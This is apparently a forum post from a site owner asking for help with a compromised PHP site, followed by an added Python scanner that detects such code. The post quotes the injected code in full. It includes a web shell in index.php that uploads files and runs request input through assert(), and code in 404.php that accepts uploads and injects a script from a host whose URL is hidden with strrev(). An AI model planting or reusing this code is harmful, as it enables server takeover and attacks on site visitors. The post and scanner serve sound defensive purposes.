Here is the code injected into index.php:
if(@isset($_GET[bots])){
echo '<form action="" method="post" enctype="multipart/form-data" name="silence" id="silence">';
echo '<input type="file" name="file"><input name="golden" type="submit" id="golden" value="Done"></form>';
if($_POST['golden']=="Done"){
if(@copy($_FILES['file']['tmp_name'],$_FILES['file']['name'])){
echo'+';
}else{
echo'-';
}
}
}elseif(isset($_REQUEST['bot']))assert(stripslashes($_REQUEST[bot]));
else exit;
And here is the code injected into 404.php:
@ini_set('display_errors','off');
@ini_set('log_errors',0);
@ini_set('error_log',NULL); error_reporting(0);
@ini_set('set_time_limit',0);
ignore_user_abort(true);
if(@isset($_POST['size']) and @isset($_FILES['img']['name'])) {
@ini_set('upload_max_filesize','1000000');
$size=$_POST['size'];
$open_image=$_FILES['img']['name'];
$open_image_tmp=$_FILES['img']['tmp_name'];
$image_tmp=$size.$open_image;
@move_uploaded_file($open_image_tmp,$image_tmp);
echo "<!-- 404-NOT-FOUND-IMG -->";
} else echo "<!-- 404-NOT-FOUND-ERROR -->";
$http_report_user = $_SERVER['HTTP_USER_AGENT'];
if ( @stripos ( $http_report_user, 'bot' ) == false and @stripos ( $http_report_user, 'google' ) == false and @stripos ( $http_report_user, 'yandex' ) == false and @stripos ( $http_report_user, 'slurp' ) == false and @stripos ( $http_report_user, 'yahoo' ) == false and @stripos ( $http_report_user, 'msn' ) == false and @stripos ( $http_report_user, 'bing' ) == false ) {
$http_report = strtolower ( $_SERVER['HTTP_HOST'] );
$wordpress_report = strrev ('=ecruos&wordpress?/moc.yadot-syasse//:ptth');
$not_found_report = strrev ('=drowyek&');
$not_found_page=str_ireplace('/','',$_SERVER['REQUEST_URI']);
$not_found_page=str_ireplace('-',' ',$not_found_page);
echo '<nofollow><noindex><script src="'.$wordpress_report.$http_report.$not_found_report.$not_found_page.'"></script></noindex></nofollow>';
}?>
Please help me find where it started or the backdoor used to inject such malicious code. Also, can somebody tell me what that code does?
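
The following is an added example, not part of the original post: a small Python scanner that flags PHP files showing the traits visible in the two snippets above (request input passed to `assert`, uploaded files written to disk, error logging switched off, and `strrev()` literals that decode to a URL). The rule names and the `scan` / `scan_tree` helpers are assumptions made for this example.

```python
import re
import sys
from pathlib import Path

# Each rule lists regexes that must ALL match somewhere in one PHP file.
# Rule names are made up for this example.
RULES = {
    "request-input-executed": [
        r"\b(?:assert|eval)\s*\(\s*(?:stripslashes\s*\(\s*)?\$_(?:REQUEST|GET|POST|COOKIE)\b"],
    "upload-written-to-disk": [
        r"\$_FILES\s*\[", r"\b(?:copy|move_uploaded_file)\s*\("],
    "error-logging-disabled": [
        r"ini_set\s*\(\s*['\"](?:log_errors|error_log)['\"]"],
}
STRREV = re.compile(r"strrev\s*\(\s*(['\"])(.*?)\1\s*\)", re.I)

def scan(source):
    """Return {rule name: evidence} for one file's PHP source."""
    hits = {}
    for name, patterns in RULES.items():
        found = [re.search(p, source, re.I) for p in patterns]
        if all(found):
            hits[name] = found[-1].group(0)
    # A string literal passed to strrev() that decodes to a URL hides a remote host.
    urls = [m.group(2)[::-1] for m in STRREV.finditer(source)]
    urls = [u for u in urls if u.lower().startswith(("http://", "https://"))]
    if urls:
        hits["reversed-url"] = urls
    return hits

def scan_tree(root):
    """Scan every .php file under root; return {path: hits} for flagged files."""
    report = {}
    for path in Path(root).rglob("*.php"):
        hits = scan(path.read_text(errors="replace"))
        if hits:
            report[str(path)] = hits
    return report

# Lines copied from the post above, used as sample input.
SAMPLE_INDEX = "}elseif(isset($_REQUEST['bot']))assert(stripslashes($_REQUEST[bot]));"
SAMPLE_404 = """@ini_set('log_errors',0);
$open_image_tmp=$_FILES['img']['tmp_name'];
@move_uploaded_file($open_image_tmp,$image_tmp);
$wordpress_report = strrev ('=ecruos&wordpress?/moc.yadot-syasse//:ptth');
$not_found_report = strrev ('=drowyek&');"""

if __name__ == "__main__":
    for path, hits in scan_tree(sys.argv[1] if len(sys.argv) > 1 else ".").items():
        print(path, hits)
```

Run it with the site's document root as the only argument. Legitimate upload handlers also match the upload rule, so treat hits as leads to review rather than as a verdict.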